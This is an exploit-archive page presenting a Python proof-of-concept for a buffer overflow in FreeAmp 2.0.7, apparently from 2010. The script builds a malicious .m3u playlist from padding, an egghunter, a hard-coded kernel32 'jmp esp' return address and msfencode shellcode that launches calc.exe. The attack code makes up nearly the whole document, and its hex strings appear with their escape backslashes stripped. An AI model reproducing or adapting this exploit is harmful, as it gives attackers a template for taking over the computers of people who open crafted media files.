FreeAmp 2.0.7 .m3u Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FreeAmp 2.0.7 .m3u Buffer Overflow
# Published : 2010-12-11
# Author : zota
# Previous Title : PowerShell XP 3.0.1 Buffer Overflow 0day
# Next Title : Crystal Reports Viewer 12.0.0.549 Activex Exploit (PrintControl.dll) 0-day

# Exploit Title: FreeAmp 2.0.7 .m3u Buffer Overflow - Egghunter
# Google Dork: N/A
# Date: 11/12/2010
# Author: zota (Thanks to Andrew; andras.kabai@cert-hungary.hu)
# Software Link: http://letoltes.szoftverbazis.hu/bfc5ec1d5e80cee5b5d3f78459113ed93c51f649/4d03800a/freeamp-v2-0-7-JI2/freeampsetup_2_0_7.exe
# Version: 2.0.7
# Tested on: Windows XP SP3 HUN
# CVE : N/A


filename = "crash.m3u"

egg = "H4CK"

#egghunter --> size 32 byte

egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x48x34x43x4bx8bxfaxafx75xeaxafx75xe7xffxe7"

padding = "A" * 14654

#kernel32.dll
#7c86467b   --> jmp esp

eip = "x7bx46x86x7c"

# 16 byte nop after eip
nop= "C" * 16


#msfpayload windows/exec CMD=calc.exe r | msfencode -b "x00x0ax0d --> size 228 byte"

payload = (
"xdbxcfxd9x74x24xf4xbaxf0x1bxe7xdbx5bx31xc9" +
"xb1x33x31x53x18x03x53x18x83xc3xf4xf9x12x27" +
"x1cx74xdcxd8xdcxe7x54x3dxedx35x02x35x5fx8a" +
"x40x1bx53x61x04x88xe0x07x81xbfx41xadxf7x8e" +
"x52x03x38x5cx90x05xc4x9fxc4xe5xf5x6fx19xe7" +
"x32x8dxd1xb5xebxd9x43x2ax9fx9cx5fx4bx4fxab" +
"xdfx33xeax6cxabx89xf5xbcx03x85xbex24x28xc1" +
"x1ex54xfdx11x62x1fx8axe2x10x9ex5ax3bxd8x90" +
"xa2x90xe7x1cx2fxe8x20x9axcfx9fx5axd8x72x98" +
"x98xa2xa8x2dx3dx04x3bx95xe5xb4xe8x40x6dxba" +
"x45x06x29xdfx58xcbx41xdbxd1xeax85x6dxa1xc8" +
"x01x35x72x70x13x93xd5x8dx43x7bx8ax2bx0fx6e" +
"xdfx4ax52xe5x1exdexe8x40x20xe0xf2xe2x48xd1" +
"x79x6dx0fxeexabxc9xffxa4xf6x78x97x60x63x39" +
"xfax92x59x7ex02x11x68xffxf1x09x19xfaxbex8d" +
"xf1x76xafx7bxf6x25xd0xa9x95xa8x42x31x74x4e" +
"xe2xd0x88x9a")

buffer = padding + egg + egg + payload + "A" * (14907 - len(padding) - len(egg) - len(egg) -len(payload)) + eip + nop + egghunter + "D" * (15000 - 14907 - len(egg) - len(nop) - len(egghunter))

textfile = open(filename,'w')
textfile.write(buffer)
textfile.close()